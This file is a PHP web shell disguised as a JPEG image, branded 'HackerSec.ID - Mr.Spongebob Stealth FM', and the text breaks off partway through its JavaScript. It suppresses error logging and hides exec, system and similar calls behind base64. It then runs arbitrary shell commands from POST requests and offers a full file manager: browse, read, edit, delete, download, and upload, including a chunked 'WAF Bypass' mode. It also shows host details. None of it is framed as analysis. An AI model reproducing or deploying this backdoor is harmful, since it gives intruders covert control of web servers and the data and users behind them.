ÿØÿà JFIF 

  
 
  ÿÛ „ 	 ( %!1!%*+...983,7(-.-

ÿØÿà JFIF 

  
 
  ÿÛ „ 	 ( %!1!%*+...983,7(-.-

<?php
// === Basic Stealth Config ===
@error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@ini_set('memory_limit', '512M');

$FN_C = base64_decode('ZXhlYw==');
$FN_SE = base64_decode('c2hlbGxfZXhlYw==');
$FN_SY = base64_decode('c3lzdGVt');
$FN_PT = base64_decode('cGFzc3RocnU=');
$FN_FP = base64_decode('ZmlsZV9wdXRfY29udGVudHM=');
$FN_FG = base64_decode('ZmlsZV9nZXRfY29udGVudHM=');
$FN_FOP = base64_decode('Zm9wZW4=');
$FN_FW = base64_decode('ZnJ3aXRl');
$FN_FC = base64_decode('ZmNsb3Nl');
$FN_MKDIR = base64_decode('bWtkaXI=');
$FN_RMDIR = base64_decode('cm1kaXI=');
$FN_UNLINK = base64_decode('dW5saW5r');
$FN_RENAME = base64_decode('cmVuYW1l');

while (@ob_get_level()) @ob_end_clean();

$requested_dir = isset($_POST['d']) ? $_POST['d'] : (isset($_GET['dir']) ? $_GET['dir'] : __DIR__);
$current_dir = @realpath($requested_dir);
if ($current_dir === false) {
    $current_dir = @realpath(__DIR__);
    if ($current_dir === false) $current_dir = '/';
}

if (!@chdir($current_dir)) {
    $current_dir = @getcwd();
    if ($current_dir === false) $current_dir = '/';
} else {
    $current_dir = @getcwd();
    if ($current_dir === false) $current_dir = '/';
}

if (isset($_POST['c']) && !isset($_POST['u']) && !isset($_POST['action'])) {
    @header('Content-Type: application/json');
    $c = $_POST['c'];
    $o = '';
    
    if (function_exists($FN_C)) {
        $a = [];
        $FN_C($c . ' 2>&1', $a);
        $o = implode("\n", $a);
    } elseif (function_exists($FN_SE)) {
        $o = $FN_SE($c . ' 2>&1');
    } elseif (function_exists($FN_SY)) {
        ob_start();
        $FN_SY($c . ' 2>&1');
        $o = ob_get_clean();
    } elseif (function_exists($FN_PT)) {
        ob_start();
        $FN_PT($c . ' 2>&1');
        $o = ob_get_clean();
    }
    
    $u = @get_current_user();
    $h = @gethostname();
    $p = $u . '@' . $h . ':' . $current_dir . '$';
    
    die(json_encode(['s' => 1, 'o' => $o ?: '(no output)', 'p' => $p]));
}

if (isset($_POST['u'])) {
    @header('Content-Type: application/json');
    $m = $_POST['u'];
    $d = $current_dir . DIRECTORY_SEPARATOR;

    if ($m == '1' && isset($_POST['d_b64']) && isset($_POST['n'])) {
        $n = basename($_POST['n']);
        $b = $_POST['d_b64'];
        if (strpos($b, ',') !== false) $b = explode(',', $b)[1];
        $b = str_replace(' ', '+', $b);
        $dc = @base64_decode($b);
        
        if ($dc === false || empty($dc)) {
            die(json_encode(['s' => 0, 'm' => 'Decode failed']));
        }
        
        $f = $d . $n;
        $w = false;
        
        if (!$w && function_exists($FN_FP)) {
            $w = ($FN_FP($f, $dc, LOCK_EX) !== false);
        }
        
        if (!$w && function_exists($FN_FOP) && function_exists($FN_FW) && function_exists($FN_FC)) {
            $h = $FN_FOP($f, 'wb');
            if ($h) {
                $w = ($FN_FW($h, $dc) !== false);
                $FN_FC($h);
            }
        }
        
        if ($w) {
            @chmod($f, 0644);
            $sz = @filesize($f);
            $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
            $url = $proto . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $f);
            
            die(json_encode([
                's' => 1, 'm' => 'Upload OK', 'n' => $n,
                'z' => round($sz / 1024, 2) . ' KB', 'u' => $url, 'p' => @realpath($f)
            ]));
        } else {
            die(json_encode(['s' => 0, 'm' => 'Write failed']));
        }
    }
    
    if ($m == '2' && isset($_FILES['f'])) {
        $t = $d . '.t/';
        if (!is_dir($t)) @$FN_MKDIR($t, 0755, true);
        
        $i = (int)$_POST['i'];
        $tc = (int)$_POST['tc'];
        $n = basename($_POST['n']);
        $id = $_POST['id'];
        $cp = $t . $id . '_' . $i;
        
        $ok = @move_uploaded_file($_FILES['f']['tmp_name'], $cp);
        if (!$ok) {
            $c = $FN_FG($_FILES['f']['tmp_name']);
            $ok = ($FN_FP($cp, $c) !== false);
        }
        
        if (!$ok) {
            die(json_encode(['s' => 0, 'm' => 'Chunk save failed']));
        }
        
        $all = true;
        for ($x = 0; $x < $tc; $x++) {
            if (!file_exists($t . $id . '_' . $x)) {
                $all = false;
                break;
            }
        }
        
        if ($all) {
            $fp = $d . $n;
            $fh = $FN_FOP($fp, 'wb');
            
            if (!$fh) {
                die(json_encode(['s' => 0, 'm' => 'Cannot create file']));
            }
            
            for ($x = 0; $x < $tc; $x++) {
                $ch = $t . $id . '_' . $x;
                $cc = $FN_FG($ch);
                $FN_FW($fh, $cc);
                @$FN_UNLINK($ch);
            }
            
            $FN_FC($fh);
            @chmod($fp, 0644);
            @$FN_RMDIR($t);
            
            $sz = @filesize($fp);
            $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
            $url = $proto . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $fp);
            
            die(json_encode([
                's' => 1, 'c' => 1, 'm' => 'Complete', 'n' => $n,
                'z' => round($sz / 1024, 2) . ' KB', 'u' => $url, 'p' => @realpath($fp)
            ]));
        } else {
            $pr = round(($i + 1) / $tc * 100);
            die(json_encode(['s' => 1, 'c' => 0, 'pr' => $pr]));
        }
    }
    
    if ($m == '3' && isset($_FILES['f'])) {
        $n = basename($_FILES['f']['name']);
        $fp = $d . $n;
        
        $ok = @move_uploaded_file($_FILES['f']['tmp_name'], $fp);
        if (!$ok) {
            $c = $FN_FG($_FILES['f']['tmp_name']);
            $ok = ($FN_FP($fp, $c) !== false);
        }
        
        if ($ok) {
            @chmod($fp, 0644);
            $sz = @filesize($fp);
            $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
            $url = $proto . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $fp);
            
            die(json_encode([
                's' => 1, 'm' => 'Upload OK', 'n' => $n,
                'z' => round($sz / 1024, 2) . ' KB', 'u' => $url, 'p' => @realpath($fp)
            ]));
        } else {
            die(json_encode(['s' => 0, 'm' => 'Upload failed']));
        }
    }
}

if (isset($_POST['action'])) {
    @header('Content-Type: application/json');
    $action = $_POST['action'];
    $path = isset($_POST['path']) ? $_POST['path'] : $current_dir;
    
    function getPermissions($path_to_check) {
        if (@file_exists($path_to_check) && @is_readable($path_to_check)) {
            return @substr(sprintf('%o', @fileperms($path_to_check)), -4);
        } else {
            return "N/A";
        }
    }

    switch ($action) {
        case 'list':
            $files = [];
            $target_path_for_list = @realpath($path);
            if ($target_path_for_list === false) {
                die(json_encode(['s' => 0, 'm' => 'Cannot access directory: Invalid path or permissions.', 'cwd' => $current_dir, 'parent' => @dirname($current_dir)]));
            }

            if ($handle = @opendir($target_path_for_list)) {
                while (false !== ($entry = @readdir($handle))) {
                    if ($entry == '.' || $entry == '..') continue;
                    $item_path = $target_path_for_list . DIRECTORY_SEPARATOR . $entry;
                    $type = @is_dir($item_path) ? 'dir' : 'file';
                    $size = ($type == 'file') ? @filesize($item_path) : 0;
                    $mtime = @filemtime($item_path);
                    $perms = getPermissions($item_path);
                    
                    $files[] = [
                        'name' => $entry, 'type' => $type, 'size' => $size,
                        'mtime' => $mtime, 'perms' => $perms
                    ];
                }
                @closedir($handle);
            } else {
                 die(json_encode(['s' => 0, 'm' => 'Cannot open directory: Permissions denied or not found.', 'cwd' => $current_dir, 'parent' => @dirname($current_dir)]));
            }
            die(json_encode(['s' => 1, 'files' => $files, 'cwd' => $target_path_for_list, 'parent' => @dirname($target_path_for_list)]));
            
        case 'view':
            $content = $FN_FG($path);
            if ($content !== false) {
                die(json_encode(['s' => 1, 'content' => base64_encode($content), 'name' => basename($path)]));
            } else {
                die(json_encode(['s' => 0, 'm' => 'Cannot read file.']));
            }
            
        case 'edit':
            $content = base64_decode($_POST['content_b64']);
            if ($FN_FP($path, $content) !== false) {
                die(json_encode(['s' => 1, 'm' => 'File saved.']));
            } else {
                die(json_encode(['s' => 0, 'm' => 'Cannot write file.']));
            }
            
        case 'delete':
            if (@is_dir($path)) {
                if ($FN_RMDIR($path)) {
                    die(json_encode(['s' => 1, 'm' => 'Directory deleted.']));
                } else {
                    die(json_encode(['s' => 0, 'm' => 'Cannot delete directory (not empty or permissions).']));
                }
            } elseif (@is_file($path)) {
                if ($FN_UNLINK($path)) {
                    die(json_encode(['s' => 1, 'm' => 'File deleted.']));
                } else {
                    die(json_encode(['s' => 0, 'm' => 'Cannot delete file.']));
                }
            } else {
                die(json_encode(['s' => 0, 'm' => 'Invalid path.']));
            }
            
        case 'download':
            $filename = basename($path);
            if (@is_file($path) && @is_readable($path)) {
                @header('Content-Description: File Transfer');
                @header('Content-Type: application/octet-stream');
                @header('Content-Disposition: attachment; filename="' . $filename . '"');
                @header('Expires: 0');
                @header('Cache-Control: must-revalidate');
                @header('Pragma: public');
                @header('Content-Length: ' . filesize($path));
                @readfile($path);
                exit; 
            } else {
                die(json_encode(['s' => 0, 'm' => 'Cannot download file.']));
            }

        case 'mkdir':
            $new_dir = $path . DIRECTORY_SEPARATOR . basename($_POST['name']);
            if ($FN_MKDIR($new_dir, 0755)) {
                die(json_encode(['s' => 1, 'm' => 'Directory created.']));
            } else {
                die(json_encode(['s' => 0, 'm' => 'Failed to create directory.']));
            }

        case 'create_file':
            $file_name = basename($_POST['name']);
            $file_path = $path . DIRECTORY_SEPARATOR . $file_name;
            if (!@file_exists($file_path)) {
                if ($FN_FP($file_path, '') !== false) {
                    die(json_encode(['s' => 1, 'm' => 'File created.']));
                } else {
                    die(json_encode(['s' => 0, 'm' => 'Failed to create file.']));
                }
            } else {
                die(json_encode(['s' => 0, 'm' => 'File already exists.']));
            }

        case 'rename':
            $old_path = $path;
            $new_name = basename($_POST['new_name']);
            $new_path = dirname($path) . DIRECTORY_SEPARATOR . $new_name;
            if ($FN_RENAME($old_path, $new_path)) {
                die(json_encode(['s' => 1, 'm' => 'Renamed successfully.']));
            } else {
                die(json_encode(['s' => 0, 'm' => 'Failed to rename.']));
            }
            
        default:
            die(json_encode(['s' => 0, 'm' => 'Unknown action.']));
    }
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>HackerSec.ID - Mr.Spongebob Stealth FM</title>
<link href="https://fonts.googleapis.com/css?family=Montserrat&display=swap" rel="stylesheet">
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:'Montserrat',sans-serif;background:#1a202c;color:#e2e8f0;padding:0;min-height:100vh}
.wrap{max-width:1200px;margin:30px auto;background:#2d3748;border-radius:12px;padding:25px;box-shadow:0 10px 15px -3px rgba(0,0,0,.1)}
h1{text-align:center;color:#63b3ed;margin-bottom:25px;font-size:28px;letter-spacing:2px}
.navbar{display:flex;justify-content:center;align-items:center;background-color:#007bff;padding:10px;color:white;margin-bottom:20px;flex-wrap:wrap;gap:10px}
.navbar a{color:white;text-decoration:none;padding:8px 15px;border-radius:5px;margin:0 5px;transition:background-color .3s ease,color .3s ease;white-space:nowrap}
.navbar a:hover{background-color:#fff;color:#007bff}
.sec{background:#4a5568;border-radius:8px;padding:18px;margin-bottom:20px;border:1px solid #4a5568}
.tit{color:#f6ad55;font-size:14px;font-weight:700;margin-bottom:12px;text-transform:uppercase;border-bottom:1px solid rgba(255,255,255,.1);padding-bottom:8px}
.cw{display:flex;gap:8px;margin-bottom:12px;flex-wrap:wrap}
.ci,.fi-input,.edit-area{flex:1;padding:10px 12px;background:#2d3748;border:1px solid #4a5568;border-radius:6px;color:#cbd5e0;font-size:13px;resize:vertical}
.ci:focus,.fi-input:focus,.edit-area:focus{outline:none;border-color:#63b3ed}
.btn{padding:10px 20px;background:#63b3ed;color:#1a202c;border:0;border-radius:6px;cursor:pointer;font-weight:700;font-size:13px;transition:all .3s ease-in-out;white-space:nowrap}
.btn:hover{background:#4299e1;transform:translateY(-1px)}
.br{background:#f56565;color:#fff}
.br:hover{background:#e53e3e}
.term{background:#1a202c;color:#0f0;padding:12px;border-radius:6px;min-height:150px;max-height:400px;overflow-y:auto;font-size:12px;white-space:pre-wrap;tab-size:4}
.pr{color:#48bb78;font-weight:700}
.server-info{background-color:#4a5568;padding:20px;border-radius:8px;box-shadow:0 2px 8px rgba(0,0,0,.1);margin-bottom:20px}
.server-info h3{font-size:1.5em;color:#63b3ed;margin-bottom:15px}
.server-info-list{list-style-type:none;padding-left:0}
.server-info-list li{margin-bottom:10px;font-size:1em;color:#cbd5e0}
.server-info-list li strong{color:#e2e8f0}
.current-dir-info{background:#4a5568;padding:10px;border-left:4px solid #f6ad55;margin-bottom:10px;font-family:monospace;font-weight:bold;color:#e2e8f0;border-radius:4px}
.file-list-header,.file-item{display:flex;justify-content:space-between;align-items:center;padding:8px 0;border-bottom:1px solid rgba(255,255,255,.1);font-size:12px}
.file-list-header{font-weight:700;color:#63b3ed;margin-bottom:8px}
.file-item{transition:background-color .2s}
.file-item:hover{background-color:rgba(255,255,255,.05)}
.file-item>div{padding:0 5px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
.file-item-name{flex-basis:30%;color:#90cdf4;cursor:pointer}
.file-item-type{flex-basis:10%}
.file-item-size{flex-basis:15%;text-align:right}
.file-item-mtime{flex-basis:20%;text-align:center;color:#a0aec0}
.file-item-perms{flex-basis:10%;text-align:center;color:#f6ad55}
.file-item-actions{flex-basis:15%;text-align:right;display:flex;justify-content:flex-end;gap:8px;flex-wrap:wrap}
.file-item-actions button{background:#4a5568;border:1px solid #63b3ed;color:#90cdf4;font-size:11px;cursor:pointer;transition:all .2s;padding:4px 8px;border-radius:4px;white-space:nowrap}
.file-item-actions button:hover{background:#63b3ed;color:#1a202c;border-color:#90cdf4}
.path-nav{margin-bottom:15px;color:#a0aec0;font-size:13px;display:flex;align-items:center;flex-wrap:wrap}
.path-nav span{margin:0 3px}
.path-nav a{color:#63b3ed;text-decoration:none;transition:color .2s;cursor:pointer}
.path-nav a:hover{color:#90cdf4;text-decoration:underline}
.current-dir-controls{display:flex;gap:8px;margin-top:15px;flex-wrap:wrap}
.current-dir-controls input{flex:1;min-width:150px}
.mts{display:grid;grid-template-columns:repeat(3,1fr);gap:12px;margin-bottom:15px}
.mt{background:#2d3748;padding:15px;border-radius:8px;border:2px dashed #4a5568;cursor:pointer;transition:all .3s;text-align:center}
.mt:hover{border-color:#63b3ed;background:rgba(99,179,237,.1);transform:translateY(-2px)}
.mt.act{border-color:#63b3ed;border-style:solid;background:rgba(99,179,237,.15)}
.mi{font-size:28px;margin-bottom:6px;color:#63b3ed}
.mn{color:#e2e8f0;font-weight:700;font-size:14px}
.md{color:#a0aec0;font-size:10px;margin-top:3px}
input[type=file]{display:none}
.fi-info{background:rgba(99,179,237,.1);padding:12px;border-radius:6px;margin:12px 0;display:none;border:1px solid #63b3ed;font-size:13px}
.fi-info.sh{display:block}
.ub{width:100%;padding:14px;background:#f56565;color:#fff;border:0;border-radius:8px;font-size:14px;font-weight:700;cursor:pointer;transition:all .3s;text-transform:uppercase}
.ub:hover{background:#e53e3e;transform:translateY(-3px)}
.ub:disabled{opacity:.4;cursor:not-allowed;transform:none}
.pg{margin:15px 0;display:none}
.pg.sh{display:block}
.pbw{width:100%;height:8px;background:#2d3748;border-radius:8px;overflow:hidden}
.pb{height:100%;background:linear-gradient(90deg,#63b3ed,#90cdf4,#f6ad55);width:0%;transition:width .3s}
.pt{text-align:center;margin-top:6px;color:#63b3ed;font-size:11px}
.st-msg{padding:12px;border-radius:6px;margin-top:12px;display:none;text-align:center;font-size:12px}
.st-msg.sh{display:block}
.st-msg.ok{background:rgba(99,179,237,.2);border:1px solid #63b3ed;color:#90cdf4}
.st-msg.er{background:rgba(245,101,101,.2);border:1px solid #f56565;color:#f56565}
.rs-info{background:rgba(99,179,237,.1);padding:12px;border-radius:6px;margin-top:12px;display:none;border:1px solid #63b3ed;font-size:12px}
.rs-info.sh{display:block}
.rs-info a{color:#90cdf4;text-decoration:none;word-break:break-all}
.modal-overlay{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,.7);z-index:1000;justify-content:center;align-items:center}
.modal-overlay.sh{display:flex}
.modal-content{background:#2d3748;padding:25px;border-radius:10px;width:90%;max-width:800px;box-shadow:0 15px 30px rgba(0,0,0,.5);position:relative}
.modal-header{display:flex;justify-content:space-between;align-items:center;margin-bottom:15px;border-bottom:1px solid rgba(255,255,255,.1);padding-bottom:10px}
.modal-title{font-size:20px;color:#63b3ed}
.close-btn{background:none;border:none;color:#e2e8f0;font-size:24px;cursor:pointer}
.close-btn:hover{color:#f56565}
.modal-body textarea{width:100%;min-height:300px;background:#1a202c;border:1px solid #4a5568;color:#e2e8f0;padding:10px;border-radius:5px;font-family:monospace;font-size:14px}
.modal-body input[type="text"]{width:100%;padding:10px;margin:5px 0 10px 0;border:1px solid #4a5568;border-radius:5px;background-color:#1a202c;color:#e2e8f0}
.modal-footer{text-align:right;margin-top:15px;display:flex;justify-content:flex-end;gap:10px}
@media(max-width:768px){
.mts{grid-template-columns:1fr}
.file-list-header,.file-item{flex-wrap:wrap}
.file-item-name{flex-basis:100%;margin-bottom:5px}
.file-item-type,.file-item-size,.file-item-mtime,.file-item-perms,.file-item-actions{flex-basis:auto;width:auto;flex-grow:1;text-align:left;padding:0 2px}
.file-item-mtime{flex-grow:2}
.navbar{justify-content:space-around}
.current-dir-controls{flex-direction:column}
.current-dir-controls input,.current-dir-controls button{width:100%}
}
</style>
</head>
<body>
<div class="navbar">
<a href="#" onclick="showModal('mkdir')">Create Folder</a>
<a href="#" onclick="showModal('create_file')">Create File</a>
<a href="#" onclick="loadFiles('/home/')">Home</a>
</div>
<div class="wrap">
<h1>HackerSec.ID - Mr.Spongebob Stealth FM</h1>
<div class="server-info">
<h3>Server Info</h3>
<ul class="server-info-list">
<li><strong>Hostname:</strong> <?php echo @gethostname(); ?></li>
<li><strong>Operating System:</strong> <?php echo @php_uname(); ?></li>
<li><strong>PHP Version:</strong> <?php echo @phpversion(); ?></li>
<li><strong>Server IP:</strong> <?php echo @$_SERVER['SERVER_ADDR']; ?></li>
<li><strong>Server Domain:</strong> <?php echo @$_SERVER['SERVER_NAME']; ?></li>
<li><strong>Server Software:</strong> <?php echo @$_SERVER['SERVER_SOFTWARE']; ?></li>
<li><strong>Document Root:</strong> <?php echo @$_SERVER['DOCUMENT_ROOT']; ?></li>
</ul>
</div>
<div class="sec">
<div class="tit">FILE EXPLORER</div>
<div class="current-dir-info">
Current Directory: <span id="current-dir-display"><?php echo htmlspecialchars($current_dir); ?></span>
</div>
<div class="path-nav" id="path-nav"></div>
<div id="file-list-status" style="color:#f56565;margin-bottom:10px;display:none"></div>
<div class="file-list-header">
<div class="file-item-name">Name</div>
<div class="file-item-type">Type</div>
<div class="file-item-size">Size</div>
<div class="file-item-mtime">Last Modified</div>
<div class="file-item-perms">Perms</div>
<div class="file-item-actions">Actions</div>
</div>
<div id="file-list"></div>
</div>
<div class="sec">
<div class="tit">TERMINAL</div>
<div class="cw">
<input type="text" id="ci" class="ci" placeholder="Command..." autocomplete="off">
<button class="btn" id="eb">Run</button>
<button class="btn br" id="cb">Clear</button>
</div>
<div class="term" id="tm"><span class="pr">Loading...</span></div>
</div>
<div class="sec">
<div class="tit">UPLOAD</div>
<div class="mts">
<div class="mt act" data-m="1">
<div class="mn">Write Method</div>
<div class="md">Best (Base64 Encoded)</div>
</div>
<div class="mt" data-m="2">
<div class="mn">Chunk Method</div>
<div class="md">WAF Bypass for large files</div>
</div>
<div class="mt" data-m="3">
<div class="mn">Direct Method</div>
<div class="md">Fast Upload (may be blocked)</div>
</div>
</div>
<input type="file" id="fi">
<div class="fi-info" id="fin"></div>
<button class="ub" id="ub" disabled>UPLOAD FILE</button>
<div class="pg" id="pg">
<div class="pbw"><div class="pb" id="pb"></div></div>
<div class="pt" id="pt">0%</div>
</div>
<div class="st-msg" id="st"></div>
<div class="rs-info" id="rs"></div>
</div>
</div>
<div class="modal-overlay" id="universal-modal">
<div class="modal-content">
<div class="modal-header">
<h3 class="modal-title" id="universal-modal-title"></h3>
<button class="close-btn" id="close-universal-modal-btn">&times;</button>
</div>
<div class="modal-body" id="universal-modal-body"></div>
<div class="modal-footer" id="universal-modal-footer"></div>
</div>
</div>
<script>
let currentPath='<?php echo addslashes($current_dir);?>';
let terminalPrompt='user@host:~$';
const commandInput=document.getElementById('ci');
const terminalOutput=document.getElementById('tm');
const executeButton=document.getElementById('eb');
const clearButton=document.getElementById('cb');
const fileInput=document.getElementById('fi');
const fileInfoDisplay=document.getElementById('fin');
const uploadButton=document.getElementById('ub');
const progressBarContainer=document.getElementById('pg');
const progressBar=document.getElementById('pb');
const progressText=document.getElementById('pt');
const statusMessage=document.getElementById('st');
const resultInfo=document.getElementById('rs');
const uploadMethods=document.querySelectorAll('.mt');
const fileListDiv=document.getElementById('file-list');
const pathNavDiv=document.getElementById('path-nav');
const currentDirDisplay=document.getElementById('current-dir-display');
const fileListStatus=document.getElementById('file-list-status');
const universalModal=document.getElementById('universal-modal');
const universalModalTitle=document.getElementById('universal-modal-title');
const universalModalBody=document.getElementById('universal-modal-body');
const universalModalFooter=document.getElementById('universal-modal-footer');
const closeUniversalModalButton=document.getElementById('close-universal-modal-btn');
let selectedFile=null;
let uploadMethod='1';
(async()=>{
try{
const formData=new FormData();
formData.append('c','pwd');
formData.append('d',currentPath);
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.p)terminalPrompt=data.p;
terminalOutput.innerHTML=`<span class="pr">${terminalPrompt}</span> Ready`;
}catch(e){
terminalOutput.innerHTML=`<span class="pr">user@host:~$</span> Ready (Error: ${e.message})`;
}
console.log('[INIT] Loading:',currentPath);
await loadFiles(currentPath);
})();
executeButton.onclick=runCommand;
commandInput.onkeypress=e=>{if(e.key==='Enter')runCommand()};
clearButton.onclick=()=>terminalOutput.innerHTML=`<span class="pr">${terminalPrompt}</span> Cleared`;
async function runCommand(){
const command=commandInput.value.trim();
if(!command)return;
terminalOutput.innerHTML+=`\n<span class="pr">${terminalPrompt}</span> ${command}\n`;
try{
const formData=new FormData();
formData.append('c',command);
formData.append('d',currentPath);
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
const output=(data.o||'(no output)').replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;');
terminalOutput.innerHTML+=output;
if(data.p)terminalPrompt=data.p;
}else{
terminalOutput.innerHTML+=`<span style="color:#f56565">Error: ${data.m||'Command failed'}</span>`;
}
}catch(e){
terminalOutput.innerHTML+=`<span style="color:#f56565">Network Error: ${e.message}</span>`;
}
terminalOutput.innerHTML+='\n';
terminalOutput.scrollTop=terminalOutput.scrollHeight;
commandInput.value='';
}
async function loadFiles(targetPath){
fileListDiv.innerHTML='';
fileListStatus.style.display='none';
let resolvedTargetPath=targetPath;
if(targetPath==='..'){
const pathParts=currentPath.split('/').filter(p=>p!=='');
pathParts.pop();
resolvedTargetPath='/'+pathParts.join('/');
if(resolvedTargetPath==='')resolvedTargetPath='/';
}else if(targetPath==='.'){
resolvedTargetPath=currentPath;
}else if(!targetPath.startsWith('/')){
resolvedTargetPath=(currentPath==='/')?'/'+targetPath:currentPath+'/'+targetPath;
}
resolvedTargetPath=resolvedTargetPath.replace(/\/\/+/g,'/');
if(resolvedTargetPath.length>1&&resolvedTargetPath.endsWith('/'))resolvedTargetPath=resolvedTargetPath.slice(0,-1);
if(resolvedTargetPath==='')resolvedTargetPath='/';
console.log(`[LOAD] Target: ${targetPath} -> Resolved: ${resolvedTargetPath}`);
const formData=new FormData();
formData.append('action','list');
formData.append('path',resolvedTargetPath);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
console.log(`[RESPONSE]`,data);
if(data.s){
currentPath=data.cwd;
currentDirDisplay.textContent=currentPath;
updatePathNav(data.cwd,data.parent);
if(data.cwd!=='/'&&data.parent&&data.parent!==data.cwd){
const parentItem=document.createElement('div');
parentItem.classList.add('file-item');
parentItem.innerHTML=`
<div class="file-item-name" style="color:#f6ad55;cursor:pointer">[Parent Dir]</div>
<div class="file-item-type">DIR</div>
<div class="file-item-size"></div>
<div class="file-item-mtime"></div>
<div class="file-item-perms"></div>
<div class="file-item-actions"></div>
`;
parentItem.onclick=()=>loadFiles(data.parent);
fileListDiv.appendChild(parentItem);
}
data.files.sort((a,b)=>{
if(a.type==='dir'&&b.type!=='dir')return-1;
if(a.type!=='dir'&&b.type==='dir')return 1;
return a.name.localeCompare(b.name);
}).forEach(file=>{
const item=document.createElement('div');
item.classList.add('file-item');
let prefix=file.type==='dir'?'[DIR] ':'[FILE] ';
let nameColor=file.type==='dir'?'#90cdf4':'#e2e8f0';
const fullPath=data.cwd==='/'?'/'+file.name:data.cwd+'/'+file.name;
const escapedPath=fullPath.replace(/'/g,"\\'");
item.innerHTML=`
<div class="file-item-name" style="color:${nameColor};cursor:pointer">${prefix}${file.name}</div>
<div class="file-item-type">${file.type.toUpperCase()}</div>
<div class="file-item-size">${file.size>0?(file.size/1024).toFixed(2)+' KB':'-'}</div>
<div class="file-item-mtime">${new Date(file.mtime*1000).toLocaleString()}</div>
<div class="file-item-perms">${file.perms}</div>
<div class="file-item-actions">
${file.type==='file'?`<button onclick="event.stopPropagation();showModal('view','${escapedPath}')">View</button>`:''}
${file.type==='file'?`<button onclick="event.stopPropagation();showModal('edit','${escapedPath}')">Edit</button>`:''}
<button onclick="event.stopPropagation();deleteItem('${escapedPath}','${file.type}')">Delete</button>
${file.type==='file'?`<button onclick="event.stopPropagation();downloadFile('${escapedPath}')">Download</button>`:''}
<button onclick="event.stopPropagation();showModal('rename','${escapedPath}')">Rename</button>
</div>
`;
if(file.type==='dir'){
item.onclick=()=>{
console.log(`[CLICK DIR] ${fullPath}`);
loadFiles(fullPath);
};
item.style.cursor='pointer';
}
fileListDiv.appendChild(item);
});
}else{
fileListStatus.textContent=data.m||'Failed to list files.';
fileListStatus.style.display='block';
currentPath=data.cwd||currentPath;
currentDirDisplay.textContent=currentPath;
updatePathNav(data.cwd||currentPath,data.parent||currentPath);
}
}catch(e){
fileListStatus.textContent=`Network Error: ${e.message}`;
fileListStatus.style.display='block';
console.error('[ERROR]',e);
}
}
function updatePathNav(cwd,parent){
pathNavDiv.innerHTML='';
const rootLink=document.createElement('a');
rootLink.href='#';
rootLink.textContent='/';
rootLink.onclick=(e)=>{
e.preventDefault();
console.log('[NAV] Clicked: /');
loadFiles('/');
};
rootLink.style.cursor='pointer';
pathNavDiv.appendChild(rootLink);
if(cwd==='/'||cwd==='')return;
const parts=cwd.split('/').filter(p=>p!=='');
let pathAccumulator='';
parts.forEach((part,index)=>{
pathAccumulator+='/'+part;
const finalPath=pathAccumulator;
const separator=document.createElement('span');
separator.textContent=' / ';
separator.style.color='#a0aec0';
pathNavDiv.appendChild(separator);
const link=document.createElement('a');
link.href='#';
link.textContent=part;
link.onclick=(e)=>{
e.preventDefault();
console.log(`[NAV] Clicked: ${finalPath}`);
loadFiles(finalPath);
};
link.style.cursor='pointer';
pathNavDiv.appendChild(link);
});
}
closeUniversalModalButton.onclick=()=>{
universalModal.classList.remove('sh');
universalModalTitle.textContent='';
universalModalBody.innerHTML='';
universalModalFooter.innerHTML='';
};
async function showModal(actionType,filePath=null){
universalModal.classList.add('sh');
universalModalBody.innerHTML='';
universalModalFooter.innerHTML='';
if(actionType==='mkdir'){
universalModalTitle.textContent='Create New Directory';
universalModalBody.innerHTML='<input type="text" id="new-dir-name-input" placeholder="Directory Name" required>';
universalModalFooter.innerHTML='<button class="btn" id="confirm-create-dir-btn">Create</button>';
document.getElementById('confirm-create-dir-btn').onclick=async()=>{
const dirName=document.getElementById('new-dir-name-input').value.trim();
if(dirName)await createDir(dirName);
universalModal.classList.remove('sh');
};
}else if(actionType==='create_file'){
universalModalTitle.textContent='Create New File';
universalModalBody.innerHTML='<input type="text" id="new-file-name-input" placeholder="File Name (e.g., shell.php)" required>';
universalModalFooter.innerHTML='<button class="btn" id="confirm-create-file-btn">Create</button>';
document.getElementById('confirm-create-file-btn').onclick=async()=>{
const fileName=document.getElementById('new-file-name-input').value.trim();
if(fileName)await createFile(fileName);
universalModal.classList.remove('sh');
};
}else if(actionType==='view'&&filePath){
universalModalTitle.textContent='Viewing: '+filePath.split('/').pop();
universalModalBody.innerHTML='<textarea id="file-content-textarea" class="edit-area" readonly></textarea>';
universalModalFooter.innerHTML='';
await loadFileContentForModal(filePath,true);
}else if(actionType==='edit'&&filePath){
universalModalTitle.textContent='Editing: '+filePath.split('/').pop();
universalModalBody.innerHTML='<textarea id="file-content-textarea" class="edit-area"></textarea>';
universalModalFooter.innerHTML='<button class="btn" id="save-file-changes-btn">Save Changes</button>';
document.getElementById('save-file-changes-btn').onclick=async()=>{
const newContent=document.getElementById('file-content-textarea').value;
await saveFile(filePath,newContent);
universalModal.classList.remove('sh');
};
await loadFileContentForModal(filePath,false);
}else if(actionType==='rename'&&filePath){
const oldName=filePath.split('/').pop();
universalModalTitle.textContent='Rename: '+oldName;
universalModalBody.innerHTML=`<input type="text" id="new-name-input" value="${oldName}" required>`;
universalModalFooter.innerHTML='<button class="btn" id="confirm-rename-btn">Rename</button>';
document.getElementById('confirm-rename-btn').onclick=async()=>{
const newName=document.getElementById('new-name-input').value.trim();
